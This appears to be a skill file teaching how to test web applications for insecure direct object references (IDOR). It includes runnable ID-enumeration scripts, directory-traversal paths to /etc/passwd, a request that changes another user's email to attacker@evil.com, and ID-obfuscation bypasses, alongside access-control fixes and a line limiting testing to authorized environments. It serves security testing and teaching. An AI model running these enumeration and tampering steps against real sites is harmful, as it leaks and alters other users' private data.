IDOR Insecure Direct Object Reference Testing

Overview

IDOR (Insecure Direct Object Reference) is an access control vulnerability that occurs when an application directly uses user-supplied input to access resources without verifying whether the user has permission to access the resource. This skill provides methods for detecting, exploiting, and preventing IDOR vulnerabilities.

Vulnerability Principle

Applications use predictable identifiers (such as IDs, filenames) to directly reference resources without verifying whether the current user has permission to access the resource.

Dangerous Code Example:

php

// Directly use user input ID
$file = file_get_contents('/files/' . $_GET['id'] . '.pdf');

Testing Methods

1. Identify Direct Object References

Common Resource Types:

User ID
File ID/filename
Order ID
Document ID
Account ID
Record ID

Common Locations:

URL parameters
POST data
Cookie values
HTTP headers
File paths

2. Enumeration Testing

Sequential ID Testing:

/user?id=1
/user?id=2
/user?id=3

UUID Testing:

/user?id=550e8400-e29b-41d4-a716-446655440000
/user?id=550e8400-e29b-41d4-a716-446655440001

Filename Testing:

/files/document1.pdf
/files/document2.pdf
/files/invoice_2024_001.pdf

3. Horizontal Privilege Testing

Access Other Users' Resources:

Current User ID: 100
Test: /user?id=101
Test: /user?id=102

Access Other Users' Files:

/files/user100_document.pdf
Test: /files/user101_document.pdf

4. Vertical Privilege Testing

Regular User Access Admin Resources:

/admin/users?id=1
/admin/settings
/admin/logs

Exploitation Techniques

User Information Leakage

Enumerate User Profiles:

bash

# Sequential enumeration
for i in {1..1000}; do
  curl "https://target.com/user?id=$i"
done

# Observe response differences

File Access

Access Other Users' Files:

/files/invoice_12345.pdf
/files/report_67890.pdf
/files/contract_11111.pdf

Combined with Directory Traversal:

/files/../admin/config.php
/files/../../etc/passwd

Data Modification

Modify Other Users' Data:

http

POST /api/user/update
Content-Type: application/json

{
  "id": 101,
  "email": "attacker@evil.com"
}

Batch Operations

Batch Data Retrieval:

python

import requests

for user_id in range(1, 1000):
    response = requests.get(f'https://target.com/api/user/{user_id}')
    if response.status_code == 200:
        print(f"User {user_id}: {response.json()}")

Bypassing Techniques

ID Obfuscation

Base64 Encoding:

Original ID: 123
Encoded: MTIz
URL: /user?id=MTIz

Hash Value:

Original ID: 123
Hash: 202cb962ac59075b964b07152d234b70
URL: /user?id=202cb962ac59075b964b07152d234b70

Parameter Name Obfuscation

Use Different Parameter Names:

/user?id=123
/user?uid=123
/user?user_id=123
/user?account=123

HTTP Method Bypass

Try Different HTTP Methods:

GET /user/123
POST /user/123
PUT /user/123
PATCH /user/123

Path Obfuscation

Try Different Paths:

/api/v1/user/123
/api/user/123
/user/123
/users/123

Tool Usage

Burp Suite

Using Intruder:

Intercept the request
Send to Intruder
Mark the ID parameter
Use numeric sequence or custom list
Observe response differences

Using Repeater:

Manually modify the ID
Test different values
Observe the response

OWASP ZAP

bash

# Use ZAP for IDOR scanning
zap-cli active-scan --scanners all http://target.com

Python Script

python

import requests
import json

def test_idor(base_url, user_id_range):
    for user_id in user_id_range:
        url = f"{base_url}/user?id={user_id}"
        response = requests.get(url)
        
        if response.status_code == 200:
            data = response.json()
            print(f"User {user_id}: {data.get('email', 'N/A')}")

test_idor("https://target.com", range(1, 100))

Verification and Reporting

Verification Steps

Confirm unauthorized resource access is possible
Verify ability to read, modify, or delete other users' data
Assess impact (data leakage, privacy violations, etc.)
Record complete Proof of Concept (POC)

Reporting Key Points

Vulnerability location and resource identifiers
Unauthorized resources accessible
Complete exploitation steps and PoC
Fix recommendations (access control, resource mapping, etc.)

Protection Measures

Recommended Solutions

Access Control Verification

python

def get_user_data(user_id, current_user_id):
    # Verify permissions
    if user_id != current_user_id:
        raise PermissionDenied("Cannot access other user's data")
    
    # Return data
    return db.get_user(user_id)

Indirect Object Reference

python

# Use mapping table
user_mapping = {
    'abc123': 100,
    'def456': 101,
    'ghi789': 102
}

def get_user(mapped_id):
    real_id = user_mapping.get(mapped_id)
    if not real_id:
        raise NotFound()
    return db.get_user(real_id)

Role-Based Access Control

python

def check_permission(user, resource):
    if user.role == 'admin':
        return True
    if resource.owner_id == user.id:
        return True
    return False

Resource Ownership Verification

python

def update_user_data(user_id, data, current_user):
    user = db.get_user(user_id)
    
    # Verify ownership
    if user.id != current_user.id and current_user.role != 'admin':
        raise PermissionDenied()
    
    # Update data
    db.update_user(user_id, data)

Use Unpredictable Identifiers

python

import uuid

# Use UUID instead of sequential ID
resource_id = str(uuid.uuid4())

Principle of Least Privilege
- Only return data the user is authorized to access
- Use data filtering
- Limit the scope of accessible resources

Notes

Only perform in authorized testing environments
Avoid accessing or modifying real user data
Note differences in access control for different resources
Pay attention to request frequency during testing to avoid triggering protections

idor-testing

NPX Install

Tags

SKILL.md Content (Chinese)

IDOR Insecure Direct Object Reference Testing

Overview

Vulnerability Principle

Testing Methods

1. Identify Direct Object References

2. Enumeration Testing

3. Horizontal Privilege Testing

4. Vertical Privilege Testing

Exploitation Techniques

User Information Leakage

File Access

Data Modification

Batch Operations

Bypassing Techniques

ID Obfuscation

Parameter Name Obfuscation

HTTP Method Bypass

Path Obfuscation

Tool Usage

Burp Suite

OWASP ZAP

Python Script

Verification and Reporting

Verification Steps

Reporting Key Points

Protection Measures

Recommended Solutions

Notes